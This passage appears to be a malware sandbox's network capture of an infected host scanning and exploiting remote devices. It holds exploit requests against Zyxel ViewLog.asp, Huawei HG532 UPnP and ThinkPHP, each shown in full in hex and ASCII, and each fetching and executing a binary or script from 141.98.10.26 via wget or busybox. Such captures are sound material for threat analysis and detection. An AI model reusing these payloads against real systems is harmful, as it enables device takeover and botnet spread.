Nov 22, 2023 08:39:28.530481100 CET	12007	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
601	192.168.2.23	46578	41.45.28.255	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:28.880183935 CET	12021	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:39:29.171624899 CET	12034	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
602	192.168.2.23	34908	41.239.75.245	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:28.883759975 CET	12023	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:39:29.144598007 CET	12034	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
603	192.168.2.23	42768	112.126.235.90	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.396836042 CET	12069	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:29.704546928 CET	12136	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:36:43 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
604	192.168.2.23	42412	88.228.99.167	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.451181889 CET	12070	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
605	192.168.2.23	55186	88.221.47.73	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.601717949 CET	12134	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:29.806395054 CET	12142	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:29 GMT Date: Wed, 22 Nov 2023 07:39:29 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 30 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 37 36 39 26 23 34 36 3b 33 30 63 34 65 38 33 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.408e2117.1700638769.30c4e83a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
606	192.168.2.23	55656	88.248.50.239	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.643542051 CET	12135	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:29.890858889 CET	12149	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:30:42 GMT Server: cisco-IOS Accept-Ranges: none Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
607	192.168.2.23	46502	88.129.109.55	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.795993090 CET	12141	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:30.000255108 CET	12158	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Fri, 09 Jan 1970 06:22:52 GMT Server: lighttpd/1.4.35-devel-180704M Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
608	192.168.2.23	47714	85.69.35.234	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.946923971 CET	12154	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.501919985 CET	12200	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:31.621686935 CET	12386	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:33.893419027 CET	12562	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:38.500690937 CET	13222	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:47.459486961 CET	14296	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:06.912708044 CET	16558	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:43.771723986 CET	19766	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
609	192.168.2.23	45730	94.122.88.32	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.985794067 CET	12155	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
610	192.168.2.23	40828	94.122.2.231	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.988734007 CET	12156	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
611	192.168.2.23	57902	94.122.91.40	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.989677906 CET	12156	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
612	192.168.2.23	55212	88.209.202.197	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:29.996788025 CET	12157	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:30.279150009 CET	12165	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
613	192.168.2.23	58080	88.178.249.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:30.191761971 CET	12164	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:30.631122112 CET	12202	IN	HTTP/1.1 404 Not found Connection: close Data Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a Data Ascii: 404: File not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
614	192.168.2.23	55242	88.209.202.197	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:30.561765909 CET	12200	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
615	192.168.2.23	42076	94.130.231.44	8080

Timestamp	kBytes transferred	Direction	Data
